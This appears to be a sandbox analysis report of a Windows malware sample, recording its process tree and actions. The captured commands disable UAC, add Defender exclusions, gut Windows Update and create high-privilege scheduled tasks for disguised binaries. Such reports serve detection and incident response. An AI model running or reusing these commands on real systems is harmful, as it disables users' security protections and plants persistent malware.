PID 3596 wrote to memory of 3564	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 3564	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 2912	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 2912	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 2064	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 2064	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4308	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4308	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	powershell.exe
PID 3596 wrote to memory of 4372	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	cmd.exe
PID 3596 wrote to memory of 4372	3596	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe	cmd.exe
PID 4372 wrote to memory of 1600	4372	cmd.exe	w32tm.exe
PID 4372 wrote to memory of 1600	4372	cmd.exe	w32tm.exe
PID 4372 wrote to memory of 4564	4372	cmd.exe	spoolsv.exe
PID 4372 wrote to memory of 4564	4372	cmd.exe	spoolsv.exe
PID 4564 wrote to memory of 868	4564	spoolsv.exe	WScript.exe
PID 4564 wrote to memory of 868	4564	spoolsv.exe	WScript.exe
PID 4564 wrote to memory of 4352	4564	spoolsv.exe	WScript.exe
PID 4564 wrote to memory of 4352	4564	spoolsv.exe	WScript.exe
PID 4564 wrote to memory of 2376	4564	spoolsv.exe	new1.exe
PID 4564 wrote to memory of 2376	4564	spoolsv.exe	new1.exe
PID 4564 wrote to memory of 2376	4564	spoolsv.exe	new1.exe
PID 4564 wrote to memory of 4852	4564	spoolsv.exe	C4Updater.exe
PID 4564 wrote to memory of 4852	4564	spoolsv.exe	C4Updater.exe
PID 4564 wrote to memory of 2396	4564	spoolsv.exe	SysApp.exe
PID 4564 wrote to memory of 2396	4564	spoolsv.exe	SysApp.exe
PID 4564 wrote to memory of 2396	4564	spoolsv.exe	SysApp.exe
PID 4852 wrote to memory of 3044	4852	C4Updater.exe	conhost.exe
PID 4852 wrote to memory of 3044	4852	C4Updater.exe	conhost.exe
PID 4852 wrote to memory of 3044	4852	C4Updater.exe	conhost.exe
PID 3044 wrote to memory of 3784	3044	conhost.exe	powershell.exe
PID 3044 wrote to memory of 3784	3044	conhost.exe	powershell.exe
PID 3044 wrote to memory of 4276	3044	conhost.exe	cmd.exe
PID 3044 wrote to memory of 4276	3044	conhost.exe	cmd.exe
PID 4276 wrote to memory of 212	4276	cmd.exe	sc.exe
PID 4276 wrote to memory of 212	4276	cmd.exe	sc.exe
PID 3044 wrote to memory of 3512	3044	conhost.exe	powershell.exe
PID 3044 wrote to memory of 3512	3044	conhost.exe	powershell.exe
PID 4276 wrote to memory of 3496	4276	cmd.exe	sc.exe

System policy modification 1 TTPs 9 IoCs

evasion

Modify Registry

T1112

Processes:

47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exespoolsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	spoolsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	spoolsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	spoolsv.exe

C:\Users\Admin\AppData\Local\Temp\47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
"C:\Users\Admin\AppData\Local\Temp\47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe"
1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\fontdrvhost.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\services.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\explorer.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4YVzclJm4V.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:3300

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
3⤵
PID:1768

C:\Users\Admin\AppData\Local\Temp\47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe
"C:\Users\Admin\AppData\Local\Temp\47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe"
3⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\47914fa6b0464f1a14c06792e85ce1ba4620b950a1dfb5168d097fda39b8a6fe.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\L2Schemas\dllhost.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\es-ES\RuntimeBroker.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\conhost.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\SppExtComObj.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Idle.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\spoolsv.exe'
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\OfficeClickToRun.exe'
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\e0hiXZS5Rl.bat"
4⤵
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
5⤵
PID:1600

C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\spoolsv.exe
"C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\spoolsv.exe"
5⤵
- UAC bypass
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2c798b3f-d8f0-41ee-a040-64274503521c.vbs"
6⤵
PID:868

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b14288d-bbda-4ce5-aef0-9348ffa836c4.vbs"
6⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\new1.exe
"C:\Users\Admin\AppData\Local\Temp\new1.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Users\Admin\AppData\Local\Temp\C4Updater.exe
"C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4852

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\C4Updater.exe"
7⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAYQB2AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHIAcABwACMAPgAgAEAAKAAgADwAIwB2AGkAdgBnACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBxAHcAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAawBmACMAPgA="
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
8⤵
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\system32\sc.exe
sc stop UsoSvc
9⤵
- Launches sc.exe
PID:212

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
9⤵
- Launches sc.exe
PID:3496

C:\Windows\system32\sc.exe
sc stop wuauserv
9⤵
- Launches sc.exe
PID:2360

C:\Windows\system32\sc.exe
sc stop bits
9⤵
- Launches sc.exe
PID:4684

C:\Windows\system32\sc.exe
sc stop dosvc
9⤵
- Launches sc.exe
PID:4804

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
9⤵
- Modifies registry key
PID:744

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
9⤵
- Modifies registry key
PID:4892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
9⤵
- Modifies security service
- Modifies registry key
PID:1076

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
9⤵
- Modifies registry key
PID:4552

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
9⤵
- Modifies registry key
PID:1488

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4212

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3728

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:4916

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:4560

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:2932

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:4248

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
9⤵
PID:4088

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
9⤵
PID:4740

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
9⤵
PID:2404

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
9⤵
PID:2768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
9⤵
PID:3740

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
9⤵
PID:2284

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
9⤵
PID:4320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAaQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABTAG0AYQByAHQAUwBjAHIAZQBlAG4AUQBDAFwARABlAGYAZQBuAGQAZQByAFwARABlAGYAZQBuAGQAZQByAFAAcgBvAHQAZQBjAHQAaQBvAG4ALgBlAHgAZQAiACcAKQAgADwAIwBlAGQAYgB4ACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAbgB5AGwAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB5AGkAeQBnACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBTAG0AYQByAHQAUwBjAHIAZQBlAG4ARABlAGYAZQBuAGQAZQByAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdQAjAD4AOwA="
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
6⤵
- Executes dropped EXE
PID:2396

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
7⤵
- Creates scheduled task(s)
PID:4772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\odt\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default User\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\L2Schemas\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\L2Schemas\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\L2Schemas\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Defender\es-ES\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\addins\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\addins\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Sidebar\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
